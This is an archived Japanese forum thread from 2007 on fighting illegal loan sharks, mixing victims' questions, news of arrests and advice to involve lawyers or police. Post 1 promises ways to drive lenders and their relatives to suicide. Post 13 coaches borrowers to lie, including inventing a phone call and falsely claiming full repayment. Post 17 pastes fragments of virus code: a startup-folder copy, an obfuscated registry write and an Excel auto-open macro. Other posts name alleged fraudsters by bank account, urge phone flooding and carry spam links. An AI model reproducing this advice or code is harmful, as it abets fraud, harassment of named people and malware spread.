5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ヤミ金撲滅】違法闇金を追い込む方法【死ね】

1 :名無しさん@お腹いっぱい。:2007/08/10(金) 22:37:59 ID:ppgVOpoq0
ここでは、「闇金」(違法な金利で営業している無許可業者)に限定します。
しかしながら、ここでの内容は対・登録業者に対しても参考になるものと思います。

ここで受けた知識の悪用は望みませんが、
本来の「人道的兼経済的」目的を逸脱し、
「罠に陥れる」事によって商売を成り立たせる昨今の業者のやり口には
徹底的に抵抗する手段であって良いと考えます。

事実上、合法的に業者を追い詰める、また業者の従業員を追い詰める内容もここには含まれますが、
それは一つの知識または事例の紹介であり、
推奨するものではない事を、各業者には忠告しておきます。

2 :名無しさん@お腹いっぱい。:2007/08/10(金) 22:40:25 ID:/sXgIJI5O
2です。梅。
   ∧∧
   /⌒ヽ)
  f三 ∪
  ○三 |
  (/~∪
  三三
 三三
三三三

3 :名無しさん@お腹いっぱい。:2007/08/10(金) 22:44:44 ID:ppgVOpoq0
ノウハウを公開していきます。
現在、意図的に(違法業者の)様子を見ている段階ですので、
方法の公開はしばらく後(1〜2日後)となりますがご了承下さい。

ここには、違法業者やその親族を自●迄追い込む方法を含みます。

4 :名無しさん@お腹いっぱい。:2007/08/10(金) 22:58:23 ID:ppgVOpoq0
闇金に対し、自らの責任を感じる必要・反省の必要は一切無し。
このスレッドでは、今後様々な合法的方法を公開してゆきます。
被害者からのご相談の書き込みも歓迎いたします。
全て、掲示板内で返答します。個人名やメールアドレス、居住地などは一切聞きませんのでご安心下さい。


5 :名無しさん@お腹いっぱい。:2007/08/11(土) 02:39:36 ID:aUjGKSR6O
早くしりたい
限界きてます

6 :名無しさん@お腹いっぱい。:2007/08/11(土) 03:10:42 ID:1/xRmGA00
それでは質問どうぞ↓

7 :名無しさん@お腹いっぱい。:2007/08/11(土) 13:13:55 ID:eDseIkqzO
ヤミ金(高利貸し)でも契約内容を本人に確認させて同意の上で貸してるんでしょ?本人だって違法と知ってて納得して借りてるんだから契約通り返すのが人として当然なんじゃないの?
ちなみに私は借金無しの個人です。ヤミ金は怖いんで私はいいですが。

8 :名無しさん@お腹いっぱい。:2007/08/11(土) 14:06:51 ID:zCnyhVmt0
まぁな。

9 :名無しさん@お腹いっぱい。:2007/08/11(土) 14:38:47 ID:OCoj0A02O
契約書がなけりゃ無意味。出資法というのもあるしな。

10 :名無しさん@お腹いっぱい。:2007/08/11(土) 14:55:08 ID:P0ZnGXmM0
坂本金融には気を付けろ

11 :名無しさん@お腹いっぱい。:2007/08/11(土) 15:24:33 ID:hfcmlPJ30
闇金から借りる方にも罰則を設ければ闇金がかなり減ると思うけどそういう法律できないかな。

12 :名無しさん@お腹いっぱい。:2007/08/11(土) 15:40:53 ID:KlPWChm5O
漫画「闇金ウシジマくん」1巻で闇金狩の話が
あったな。
他人の住民票を空き部屋に勝手に移動して原付
バイク免許取得して金を騙し取る話。

13 :1:2007/08/11(土) 15:57:27 ID:QsdCJOom0
早速、>>7のような擁護者が来ていますね。

闇金に対しては元金すら返す必要はありません。
念の為、相手側の悪徳弁護士や、裁判になった時のことを考えて下記を実行してください。

【1・振り込み返済の場合】
一度だけ入金してください。ただし約定の金額を払う必要はなし。
1000円くらいでいいです。
「返済が遅れる連絡を事前にしたところ、待っても良いが1000円だけ入金するよう言われた」
と、とぼけてください。もちろん嘘でいいのです。連絡などしていなくてもしたと言ってください。
「何日の何時ごろ、電話番号は何番」と聞かれた時にすぐ答えられるよう。
担当者名は聞いたが答えてくれなかった、でいいです。
相手はクズです。こちらが騙したって構いません。堂々としてください。

【2・事務所へ持参の場合】
行ってはいけません。
住所がわかっているわけですから、現金書留で1000円を送ってください。
あとは上と同様です。
ですが闇金は住所を隠すはずですから、このケースはほとんどないでしょうね。

【3・集金に来る場合】
集金に来て車の中で払うケース、これが一番多いのでは。
これが一番やりやすい。こちらが「払っていない」証拠も残らないのです。
相手は領収書も出さないし完済しても借用書も返さないケースが多い。
この悪意を逆に利用します。
ズバリ、「全額返した」と主張してください。
指定の日時に相手は車で来ますね。あなたは行くことはないのですが、
その日時に車が来ていた事実がなければなりません。来ているのか、離れた場所から確認しておいてください。
水道メーターなどに隠しておくように指定される場合もあるようですね。
この場合はさらに楽。あくまで「入れた」と主張してください。
あとで言われた時は「二重に払わせる気か!」と本気で怒ってください。

************************************************
下準備はここまでです。
続きはまた書きます。

14 :名無しさん@お腹いっぱい。:2007/08/11(土) 16:04:01 ID:S4DRpaLJ0
闇YAMMY−☆ 


おいちッ 

15 :名無しさん@お腹いっぱい。:2007/08/11(土) 17:11:02 ID:YYT7iXrm0
>>5
そうだよな、西村。
金借りて返さない上に
借りた側に迷惑かける、
それが和史だったかカスシだったか
お前のやり口だもんな。

16 :名無しさん@お腹いっぱい。:2007/08/11(土) 23:23:53 ID:qMuGKIw30
>>3
闇金には金返さなきゃいいだけで
わざわざ報復する必要はないと思う…
ほっとけよ

17 :名無しさん@お腹いっぱい。:2007/08/11(土) 23:31:45 ID:qMuGKIw30
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
???????

18 :晴彦 ◆cG2BAEwlOk :2007/08/12(日) 03:05:08 ID:WtMKr7vLO
ちょwww闇金撲滅ww称讃wwこんなウイルスcord駄目w晒しあげw

19 :晴彦 ◆cG2BAEwlOk :2007/08/12(日) 03:08:27 ID:WtMKr7vLO
晒しあげ

20 :名無しさん@お腹いっぱい。:2007/08/12(日) 07:31:45 ID:wfNUb2lL0
>>18-19
うーむ、これ程カッコ悪い失敗が
未だかつてあっただろうか

21 :名無しさん@お腹いっぱい。:2007/08/12(日) 08:12:56 ID:f3ed+jCt0
俺は全く闇金を擁護していないが、
借りる方も相応のバカだとも思っている。
だからこそ言わせてくれ。
まさかこのスレに書いてあることを
実行する奴はいないだろうが、
本気で実行を考えてるごく一部の奴に。
「生兵法で勝てると思うな」
向こうは犯罪のプロだ。
どんな盲点を突いてくるか分からない。
そこに素人のお前らが手を出すと
下手すりゃ沈められるぞ、マジで。

決して闇金は擁護しないがな。
その怖さを伝えただけだ。

22 :名無しさん@お腹いっぱい。:2007/08/12(日) 09:47:38 ID:/Hr2C46XO
>>21今まで数十件から数百万借りパクしてるがまだ沈めにこないみたいだな?

盲点をつく割には、結局「沈める」かよw
盲点なんて意味ないだろーが。言ってる事おかしいぜ?

素人が怖さを語っても全く足りない真実味

23 :名無しさん@お腹いっぱい。:2007/08/12(日) 10:22:52 ID:2KsqOFjeO
最初に貸して半分近くは借りパクするからな。

24 :名無しさん@お腹いっぱい。:2007/08/12(日) 10:32:13 ID:og2OjHNW0
取立てこないところがほとんどだけど、たまに来るんだよね。自宅や会社にまで取り立てにくるやつが

25 :名無しさん@お腹いっぱい。:2007/08/12(日) 11:21:04 ID:rmfENjK3O
>>22
別にこんなとこで強がらなくてもいいのに…

26 :名無しさん@お腹いっぱい。:2007/08/12(日) 12:49:22 ID:vUwQBzrEO
>>22 もしそれが本当だったら最低の人間だな。
決して闇金は抱擁しないけど借りパクなんて相手が闇金だろうとするべきじゃないと思うぞ。つかそんなこと本当にできるのか?俺の今の地位、立場、家族その他考えたらとてもじゃないができないが…

27 :名無しさん@お腹いっぱい。:2007/08/12(日) 13:03:32 ID:/Hr2C46XO
>>25強がってるか事実かは受け取る側の裁量で変わるな
普通に強気の発言なんかない気がするが;

>>26余裕で出来るよ。ここでレクチャーしてる奴とはやり方違うけど
地位も立場も家族もあるやつが日曜の真っ昼間から2ちゃんねるの借金板に出現しますかそうですか。


28 :名無しさん@お腹いっぱい。:2007/08/12(日) 13:32:32 ID:rmfENjK3O
↑地位も立場も家族も何も無いんですかそうですか

29 :名無しさん@お腹いっぱい。:2007/08/12(日) 13:42:45 ID:/Hr2C46XO
↑お前と同じだよ。

30 :名無しさん@お腹いっぱい。:2007/08/12(日) 15:11:55 ID:1etJ2U1A0
>>16
同意。
確かに闇金は悪いが、
悪けりゃ悪いで返さなきゃいいだけだし、
報復すればどんな事されるか…
金返さずほっとく、これに尽きる。
怒るのは、親族に手を出された時だけ。
(家族を殴ったり、実家に上がられたりした時だけ)

借りたお前にも非はある。
勿論闇金は悪だが、素人は放っておくのが最善策。

31 :名無しさん@お腹いっぱい。:2007/08/12(日) 15:27:58 ID:BLLh67Un0
アボーンとDQNってどう言う意味ですか?

32 :名無しさん@お腹いっぱい。:2007/08/12(日) 15:37:36 ID:1etJ2U1A0
>>31
sageでいいよ。
アボーン=書き込み削除
DQN=気違い
の意。

て言うか、普通に警察の名前出せば
闇金は逃げてくよ。
しつこくやると闇金に逆恨みされて
家族に手が伸びるぞ。
触らぬ神に祟りなし。

33 :名無しさん@お腹いっぱい。:2007/08/12(日) 16:36:13 ID:vUwQBzrEO
>>27 日曜の真昼間じゃなきゃ来れないんだが。

34 :名無しさん@お腹いっぱい。:2007/08/12(日) 16:39:15 ID:1etJ2U1A0
>>33
まぁまぁ。

結論:闇金には最初から手を出すな
   手を出してもほっとけ
   以上

35 :名無しさん@お腹いっぱい。:2007/08/12(日) 19:57:05 ID:rmfENjK3O
>>33 別に日曜の昼間でも平日の夜でもどっちでもいいっすよ
要するに、俺はお前らと違ってそんなに2ちゃんねるは見てないってことが言いたいんすよね?

36 :名無しさん@お腹いっぱい。:2007/08/12(日) 20:31:37 ID:v37rZ/Ii0
>>35
議論は他のスレで。
そんなことどうでもいいだろ。

37 :名無しさん@お腹いっぱい。:2007/08/13(月) 13:34:04 ID:dNvXAlpq0
<無料>女の子の高収入『お仕事診断テスト』
http://kou.zz.tc/shuunyuu


38 :名無しさん@お腹いっぱい。:2007/08/13(月) 15:44:58 ID:yt/l4d960
まあ、なんだ、>>34が一番いい方法って事で。

39 :名無しさん@お腹いっぱい。:2007/08/13(月) 19:01:22 ID:kQyzti360
>>38
同意
ハナから何もしない
これ最強

40 :名無しさん@お腹いっぱい。:2007/08/14(火) 00:13:54 ID:GZM24gOkO
>>31
DQNというのは正確にはヤンキーとか反社会的な行動をする人とか
一般的な常識を知らない人とかを指す言葉なのです。
テレ朝の目撃ドキュンからきていてマミー石田さんがあやしーわーるどとかでドキュンと使っていたのです。
2ちゃんではDQNと表記するようになったのです。

41 :名無しさん@ご利用は計画的に:2007/09/10(月) 00:54:55 ID:/Bi02CFy0
ヤミ金、イシカワとかほっときましょう。

42 :闇金詐欺会社ミリオンプランニングで借りる詐欺:2007/10/02(火) 19:27:05 ID:HdykF8ma0
ミリオンプランニング詐欺グループ芝浩昭
http://www.rondan.co.jp/html/mail/0706/070613-5.html
悪名高きミリオンプランニング砂田卓の会社
二代目ミリオンプランニング
株式会社よつばインテック
http://www.yotsuba-intech.com/

43 :すなだ:2007/10/03(水) 19:19:43 ID:lDeMUUOo0
タイトル: 紹介詐欺? もり もり  さん
業者名: 平成総合鑑定調査 体験談

ミリオンプランニング高見沢 久保田
よつばインテック すなだ たく
プランニングモーゲージは、電話番号が違うだけのインチキ詐欺会社で〜す。
一人で何役もこなし、俳優顔負けだがあまりにもすきがあり、ここで話しにのっていけませんよ。融資を受けるのに、紹介先で手数料を払ってまでお金を借りるのはやめましょう。
これは、詐欺です。電話の向こうで雑音が聞こえ、詐欺集団の声がまる聞こえ。
おそらく借金まみれの連中である、落ちぶれた女性社員(おばはん)も在籍してます。
劇団員はかたやま、もり、ふじた、偽名のオンパレード。みなさん、この掲示板ではっとおもった方はまだ、大丈夫被害は免れるでしょう。



44 :名無しさん@お腹いっぱい。:2007/10/08(月) 11:33:00 ID:NT5BZgXq0
「上限金利の引き下げはマクロ経済に大きな影響を及ぼす」などと、
サラ金業界がよろこびそうな論文ばかりを発表してきた
早稲田大学の消費者金融サービス研究所、通称サラ研。
その運営費のほぼすべてが大手・中堅消費者金融会社の
寄付金でまかなわれていることがわかった。

総額5,100万円も寄付した「消費者金融サービス振興協会」の理事長はアコム社長で、
理事4人はプロミス、アイフル、武富士、三洋信販の経営者だ。
サラ金“御用学者”たちが、業界のカネで業界のための論文を量産する−−
そんな、学問の本道を外れた、歪んだ産学連携の姿が見えてきた。

全文はソースで
http://www.mynewsjapan.com/kobetsu.jsp?sn=755

45 :ヤミ金バスターズ:2007/10/10(水) 23:14:42 ID:YkOb9s760
ヤミ金にお困りの方。ご一報下さい、親切丁重に対応致します。

ヤミ金の居場所を突き止め警察に通報逮捕まで協力致します。会社、自宅、携帯等への連絡催促は即刻無くなります。
お困りの方は是非メールでお問い合せ下さい。

ヤミ金はただの餓鬼のの集まり、捕まればすぐに泣き出し、仲間の事はべらべらしゃべりまくる程度の奴らです。
うるさいだけでなにも出来ません。

一週間で捕まえます。

メール:fulie@kjb.biglobe.ne.jpまでご連絡下さい。

46 :名無しさん@お腹いっぱい。:2007/10/10(水) 23:21:22 ID:PtnkvzA30
やみ禁は支払う義務がないよ
これに対策が書いてある見て。 がんばれ。びびったら負け。
http://www.yamikinyuu.info/2006/12/post_6.html

47 :名無しさん@お腹いっぱい。:2007/10/14(日) 12:09:46 ID:VAG0j5RR0
しかしヤミ金から借りて利子を返すために殺人までした人間がいるよな
返却しないとそんなに恐ろしいのか?

48 :名無しさん@お腹いっぱい。:2007/10/14(日) 19:18:37 ID:KyhHA02b0
>>47
ヤミ金なんざ、「ネット番長」ならぬ「電話番長」
実際は、自分がどこの誰だかわからない状況じゃないと何もできないんだが

とくに東京から地方の人相手にやったりしてるんで、そんなの電話番号かえ
てしまえば、どうしようもない

・・・はずなんだけど、ところが実際はそうは問屋がおろさない

面倒なのは、借りる時に必ず、勤務先や、親族・友人の連絡先も押さえられ
ているからだ

自分の電話番号を通話不能状態にすると、こんどは被害が勤務先や親族等に
及ぶ
とくに、勤務先に熾烈なまねされると、解雇されてしまっては、もともこも
ないから、必死でお金を集めないとしょうがなくなる

49 :名無しさん@お腹いっぱい。:2007/10/15(月) 20:54:05 ID:xRy/qcp7O
>>45って本当にやってくれるの?それとも詐欺?

50 :名無しさん@お腹いっぱい。:2007/10/15(月) 22:34:02 ID:qvvx1ux20
メールしたけど返事なし

51 :名無しさん@お腹いっぱい。:2007/10/15(月) 23:04:57 ID:xRy/qcp7O
>>50さんメールしてみたんですか?そこにメールしてから融資案内のメールが来たとかないですか?

52 :名無しさん@お腹いっぱい。:2007/10/16(火) 00:37:36 ID:MV6SlT2tO
新橋に昔あったが『とら屋』って言う闇金まだあるのかな?
もしまだあったら注意しょう!もしかしたら名前変わってるかも!


53 :名無しさん@お腹いっぱい。:2007/10/17(水) 18:52:52 ID:wMy1MOic0
超高金利の090業者逮捕=悪質取り立て繰り返す−警視庁
http://headlines.yahoo.co.jp/hl?a=20071017-00000054-jij-soci
10月17日12時33分配信 時事通信

店舗を構えず携帯電話を利用する「090金融」を営業し、最高で法定の約328倍の利息を受け取ったとして、
警視庁生活経済課などは17日、出資法違反と組織犯罪処罰法違反(犯罪収益等隠匿)容疑などで、
貸金業「ロングラン」元経営者木村裕司容疑者(24)=埼玉県ふじみ野市亀久保=ら3人を逮捕した。

ダイレクトメールで多重債務者を勧誘し、ヤミ金融なのに、消費者金融を装い「東証上場予定」「年利18%」と宣伝。
店舗の住所と固定電話番号も記載したが、実際は私書箱と転送電話を使った090金融だった。

返済が滞った客には、「至急電話をよこせ」と電報を送り、「返さないと殺すぞ」と電話で脅して自宅に押し掛け、悪質な取り立てを繰り返した。
元利振込先には客から取り上げた銀行口座を使った。
2005年1月から営業し、今年6月までの1年余で約400人から約8000万円を受け取っていた。

超高金利の090業者逮捕―警視庁
http://headlines.yahoo.co.jp/hl?a=20071017-00000019-jijp-soci.view-000


54 :名無しさん@お腹いっぱい。:2007/10/17(水) 22:01:24 ID:LzdrUZuq0
>>45にメールしたけど何もなし
返信はもちろん
よけいな融資勧誘のメールも何も来ない
まあどうせフリメで出しているから
何があっても大丈夫だけどね

55 :詐欺に注意:2007/10/17(水) 22:32:53 ID:JiRjeas40
以下は、実際にあった振り込め詐欺の詐欺師の情報です。これ以上の被害
拡大のためにも、情報を開示します。東京在住のはず。融資保証詐欺師。
○ズホ銀行 ○ルセ支店 カトウ ヨウイチ
○ブン銀行 ○ンジー支店 イズモト ジュン


56 :名無しさん@お腹いっぱい。:2007/10/17(水) 22:40:23 ID:EIPFjE6SO
闇金融の携帯へ何回線もで一日電話したらどうだろうか?そんな暇ないか・・・・昔は携帯なかったから、電話回線にそうやって同業者つぶししたみたいだけど、今は携帯いくつでも手に入るから駄目か・・・・




闇金融氏根保証金詐欺もうじゃうじゃいる。

57 :名無しさん@お腹いっぱい。:2007/10/17(水) 22:44:14 ID:EIPFjE6SO
イズモトって、あまりないから特定しやすいかも。

58 :名無しさん@お腹いっぱい。:2007/10/17(水) 23:06:52 ID:uQ1baOx0O
45の人からメールきたよ!

59 :名無しさん@お腹いっぱい。:2007/10/18(木) 09:27:20 ID:o7rgu2LIO
闇金の固定電話回線やフリーダイヤルは転送されていますが、名義人を調べて場所等分かるのですか?詳しい方居ますか。

60 :あぼーん:あぼーん
あぼーん

61 :名無しさん@お腹いっぱい。:2007/10/18(木) 11:52:20 ID:r9/AeGSzO
45>>の方に本日闇金対応して頂きました。本当にこちらの身になって親切に対応して頂いた事をこの場をお借りしてお礼を申し上げます。ありがとうございました。

62 :名無しさん@お腹いっぱい。:2007/10/18(木) 13:15:07 ID:r9/AeGSzO
闇金にお困りの方に朗報!必ず闇金から救います。あなたの現状を教えて下さい。力になります。

63 :名無しさん@お腹いっぱい。:2007/10/18(木) 17:34:58 ID:NZmwyU8n0
>>61 62
IDが一緒なんですが 自作自演ですか?
62のメアドって「貸します掲示板」で見たことありますね。


64 :名無しさん@お腹いっぱい。:2007/10/18(木) 18:20:34 ID:r9/AeGSzO
自作自演と言われる方はそうおっしゃられても構いません。あなたみたいな方に付き合う暇ありませんしね。私はただ苦しんでいる方に少しでもアドバイスが出来ればと思っています。ですので信じるか信じないかはアナタ次第!です。

65 :名無しさん@お腹いっぱい。:2007/10/18(木) 18:57:17 ID:PgxvHh3D0
>>64
すみません。ケータイ止められてるんで、書かれたメアドにアクセスできません。
電話番号ここで教えてください。

66 :名無しさん@お腹いっぱい。:2007/10/18(木) 19:48:05 ID:r9/AeGSzO
65>>携帯停止になってるのにどうやって電話するの?相手も分からず個人情報はお伝えできません。メールにてやりとりしその上で電話したいと思っています。

67 :名無しさん@お腹いっぱい。:2007/10/18(木) 19:51:16 ID:r9/AeGSzO
65>> いきなり個人情報はお教えできません。メールでのやりとり後に本当に困っている方と判断出来れば電話でのやりとりをします。携帯停まってるんであればPCからメールを頂ければ返信致します。

68 :名無しさん@お腹いっぱい。:2007/10/18(木) 20:05:13 ID:T98v+6PUO
都(1)金利安い=闇
ハイツや団地拠点を見るとアホ丸出し

69 :名無しさん@お腹いっぱい。:2007/10/18(木) 22:14:01 ID:6DYLxBQRO
闇金融に対応できるとしたら弁護士、警察以外なら同業者ですか?闇金融並の料金ですか?

70 :名無しさん@お腹いっぱい。:2007/10/18(木) 22:24:02 ID:T98v+6PUO
誰も対応できんよ。
逃げて新たに作っての繰り返し。

大手しかない。

71 :名無しさん@お腹いっぱい。:2007/10/18(木) 22:33:05 ID:6DYLxBQRO
闇金バスターズって??

72 :名無しさん@お腹いっぱい。:2007/10/18(木) 23:53:54 ID:NZmwyU8n0
新手の詐欺師かな?
整理屋もどきじゃないの。金取られて、騙されてになるからやめときな。


73 :名無しさん@お腹いっぱい。:2007/10/20(土) 02:09:32 ID:qS6fC9c8O
その手の悪徳もいるから、騙されないように。

74 :.:2007/10/20(土) 16:44:54 ID:KPKD6lF20
ヤミ金の銭を踏み倒した素人何ぼでもおるで。
ヤミ金でも何処かの組織に属しているのとチンピラもどきが真似事してるのと
2種類あるから事前に確認しろ。
基本的に違法性は業者も分かっているので限界ギリギリの線までは追い込むが
無理と判断した場合は時間の無駄と思いあきらめるよ。
危ない・殺される?そんなのは99%ありえないよ。
小額の小銭回収でそんな事してたらきりがないしリスク高すぎでまずそこまでは
してこないぞ。
俺は目いっぱい引っ張って矢のような催促が来た瞬間に弁護士に相談して内容証明
を送付して月額1社1000円の均等払いにさせたぞ。
元金だけで700万なので16業者に毎月1000円返すだけでそのうち数社も潰れてるから
あと数年で半分くらいになると思う。
俺の知ってる中で一番怖いのは世間知らずの素人だよ。



75 :名無しさん@お腹いっぱい。:2007/10/20(土) 19:42:34 ID:1xLD01x1O
>>74 そうなのですか?嫌がらせは裂けられませんよね、押し貸し金融で困っています、一週間で約束通り返済したら勝手に振込みされました、今度は5日で返済するよう言われましたが弁護士さん頼むしかないですか?

76 :名無しさん@お腹いっぱい。:2007/10/20(土) 20:43:04 ID:qS6fC9c8O
口座を解約・電話番号変更

77 :名無しさん@お腹いっぱい。:2007/10/23(火) 20:37:40 ID:6kDrKOf0O
車のローンの借り換えの為にネット見つけた低金利の会社に電話しました。
融資は断られたものの、特別に推薦枠で低金利のまま他の会社から借りられるようにしてあげるから、時間を作るようにと言われました。
約束の日に電話してみると、大手消費者金融に行って枠を作って来いと言われました。
断ると、データを扱う行政に推薦して、頼んで融資出来るようにしたのに、それなら金融事故になるので、行政の方と裁判になるとか、事故を起こした以上、今のローンも一括返済になるとか言われました。


78 :名無しさん@お腹いっぱい。:2007/10/23(火) 20:43:22 ID:6kDrKOf0O
そんな話は聞いていなかったと言うと、1年以内で事故データを消して、また融資出来るようにしてあげるから、代わりに行政に対して月1万の積立てをしろと言われました。
考えさせてくださいと、電話切って、警察に相談した所、書面での契約は一切していないので大丈夫だからと言われました。
あと、しばらくは知らない番号の電話を取らないようにと言われました。

これはヤミ金でしょうか?

79 :名無しさん@お腹いっぱい。:2007/10/23(火) 20:47:08 ID:6kDrKOf0O
本当に何も知らずに、ローンの借り換えの為だけに相談しただけなのに、こんな事になって反省しています。不安も一杯です。
自宅や職場に連絡がいかないか、心配です。

どなたか詳しい方相談にのってください。アドバイスください。

分かりにくい文章、長文、失礼しました。



80 :名無しさん@お腹いっぱい。:2007/10/23(火) 21:42:23 ID:ik72mIQQO
>>79
ただの紹介屋。
金融事故云々はありえないから心配ない。
ただ、自分の家の電話、実家電話、会社電話を教えていた場合にかけてくる場合もある。
でも決して電話に出てはだめ。闇金みたいに実際に借りたわけじゃないから放っておけばすぐにあきらめるよ。
とにかく無視が解決には一番早い。
もしまわりに嫌がらせ電話等がきたら堂々とした口調でどっかで個人情報が漏れたらしくてとか言っておけばいい

81 :名無しさん@お腹いっぱい。:2007/10/23(火) 21:53:23 ID:ik72mIQQO
連投すまんが訂正
>ただの紹介屋
   ↓
紹介屋か詐欺
状況からすると他社で借りさせた金をなんだかんだと適当な事を言って送金させる詐欺の可能性大。
雑誌等の500万まで融資とか低利一本化と書いてある所は初回は信用つける為少額融資→高利返済か
保証金詐欺、他社を紹介して紹介料をとる紹介屋、
他社借り入れさせて全額振込ませる詐欺。
気をつけれ

82 :79:2007/10/24(水) 00:23:01 ID:PkRJ66jkO
>>80

ありがとうございます。
私もネットで色々調べてみました。私と同じ手口の話もあって、やはり、紹介屋、詐欺っぽいです。
私は実際にはお金を借りていない分、幸いかもしれません。
しかしまだ電話での嫌がらせの心配もあるので、暫くは様子をみようと思います。不安は残りますが...
本当にありがとうございました。



83 :名無しさん@お腹いっぱい。:2007/10/24(水) 02:21:03 ID:uN1VMH3ZO
友達が金に困っていて相談をうけた。 自分は知り合いに相談。
自分の知り合いが「金貸しの奴いるから借りてやる」という。

そこで自分が知り合いから2万を渡された。
利息の内容は一切聞かされず借用書は書かされていない。

期日は月曜日。

友達の返済が一週間近く遅れた。

利息が一日遅れる事に

2万(元金)×2万=4万

2万×4万=8万

2万×8万万=16万

2万×16万=32万………

などと利息を付けられている。
借りた金は2万。

今じゃ一週間で80万近くの利息があります。一応23日の夜に元金×2は払おうとしているんですが。明らかに非合法ですよね?

84 :名無しさん@お腹いっぱい。:2007/10/24(水) 02:25:26 ID:uN1VMH3ZO
24日の夜でした…「8万万」ではなく8万です。。

この場合は暴行、拉致など何かされてから警察なり弁護士なりいったほうがいいですか?無知ですみません。

85 :名無しさん@お腹いっぱい。:2007/10/24(水) 23:52:44 ID:SGgShamlO
23日に払うって・・・

86 :名無しさん@お腹いっぱい。:2007/10/24(水) 23:58:08 ID:SGgShamlO
訂正してありましたね、すみません。元金返して無視ですね・・・

87 :名無しさん@お腹いっぱい。:2007/10/25(木) 09:36:19 ID:b8bNZYofO
教えて下さない。ヤミ金の金って元金返さないと駄目なんですか?弁護士に相談したら払わなくていいって言ってたけど、今身内に電話が鳴りまくって、兄が払おうとしてます。どうしたら良いですか?

88 :名無しさん@お腹いっぱい。:2007/10/25(木) 09:51:15 ID:IJYLA3ZPO
本当は返さなくても良いみたいですね。何回か利息の返済してるんですか?まあ元金戻してさよならがいいですよ。嫌がらせは暫く続くと思いますが。無視しましょう。

89 :名無しさん@お腹いっぱい。:2007/10/25(木) 17:00:23 ID:KKVDMVT00
つーか、借りんなや!

終了

90 :名無しさん@お腹いっぱい。:2007/10/25(木) 17:35:25 ID:IJYLA3ZPO
皆さん、絶対借りないように。雑誌、新聞等の広告に騙されないようにして下さい。闇借りて地獄に堕ちるのは借りた人だけではありません。貴方の家族、ご両親、兄弟、親戚まで地獄に落とします。

91 :名無しさん@お腹いっぱい。:2007/10/30(火) 14:33:41 ID:WsbmmHiI0
早大副総長・江夏教授 サラ金業界からの“研究費”を身内企業に還流の疑い  
https://www.mynewsjapan.com:443/kobetsu.jsp?sn=772  
 サラ金業界からの寄付金で運営する早稲田大学消費者金融サービス研究所(通
称サラ研、所長・坂野友昭教授)の研究費をめぐり、早大副総長・江夏健一教授
の親族と疑われる人物が経営し、江夏教授自身も取締役に名を連ねていた身内企
業に、事務委託費名目でカネが還流していることが分かった。大学側が認めた。
一方、停職処分を受けた坂野教授についても、サラ金業界のカネで研究を受託し
ながら報告書が見つからず、研究実態を確認できない事実が発覚した。  


92 :名無しさん@お腹いっぱい。:2007/11/01(木) 16:50:23 ID:jbUIHCJy0
ヤミ金の収益隠す 京都府警、容疑の男を再逮捕
http://headlines.yahoo.co.jp/hl?a=20071031-00000005-kyt-l26
10月31日9時39分配信 京都新聞

京都府警生活経済課と北署は30日、組織犯罪処罰法違反(犯罪収益隠匿)の疑いで、
京都市北区上賀茂岩ケ垣内町、飲食店経営田村政廣被告(32)=貸金業法違反などの罪で起訴=を再逮捕した。

調べでは、田村容疑者は2003年3月から今年9月までの間、貸金業の登録を受けずに、
法定金利(1日0・08%)の7−8倍の金利で客に融資し、返済金や利子として
客から約1000回にわたり計約5000万円を他人名義の銀行口座に振り込ませ、収益を隠した疑い。

93 :名無しさん@お腹いっぱい。:2007/11/05(月) 02:29:12 ID:JDML82JZO
セントラルクレジット
トーシンファイナンス
ミリオンプランニング
プランニングモーゲージ
の関連性と詳細、現状の営業状況など教えて下さい

94 :名無しさん@お腹いっぱい。:2007/11/07(水) 01:00:20 ID:kKBlD2EuO
↑悪徳詐欺集団でしょ

あとは詳しい人(元社員や同業者、内部告発可)カキコ宜しく!

95 :名無しさん@お腹いっぱい。:2007/11/08(木) 21:31:44 ID:PnuZ7gpT0
闇金みたいなところから電話来る。もう半年くらい。
身内の借金を返せって。家族の携帯にも、職場にも、親戚にも。
住所も知られてる。
ほんと鬱。
でも当の本人は借りてないらしい。以前にサラ金から借金したことはあるが返済済み。
警察にも弁護士にも頼んでるが、
相手の心当たりがないので辞めさせることが出来ない。
この際捕まえられなくてもいいので闇金の奴らに仕返ししたい。
こういう電話はいつまで続くの?

96 :名無しさん@お腹いっぱい。:2007/11/09(金) 22:44:24 ID:CZ0UU/8a0
本人が借りてないって嘘ついてるだけだろwwwwwww気付けよwwwwwwwww

97 :元から絶たなきゃダメ:2007/11/10(土) 05:36:09 ID:P+pUwmlH0
>>95
どんな状況なんですか?
95は借金した身内とはどんな関係?
電話の内容は?
詳しく教えてください。

98 :名無しさん@お腹いっぱい。:2007/11/10(土) 16:10:02 ID:2g2NVvHIO
ヤミ金を9社利用してしまい、どうしようもなくなって司法書士と警察にお願いした。電話攻撃や嫌がらせでノイローゼになりそうなくらいだった!だけど・・

99 :名無しさん@お腹いっぱい。:2007/11/10(土) 16:12:05 ID:2g2NVvHIO
司法書士の先生が話しをつけてくれて、電話はなくなった。勝手に携帯電話を止められたりした。もう絶対手を出したくない。同じような人いたらカキコして下さい。

100 :名無しさん@お腹いっぱい。:2007/11/12(月) 22:11:41 ID:5bIM9tSs0
先に名簿屋潰さない?
株式会社日本コマーシャル本社 営業部 03-5645-6111 東京都中央区日本橋堀留町1丁目1-11 情報処理サービス
(中央区)
ここ、名簿屋だから。

101 :名無しさん@お腹いっぱい。:2007/11/12(月) 22:55:52 ID:kdYkL0MWO
98さん司法書士が入ったらピタリと闇からくる脅迫電話止まったんですか?

102 :名無しさん@お腹いっぱい。:2007/11/13(火) 00:38:14 ID:Nl7Irj3dO
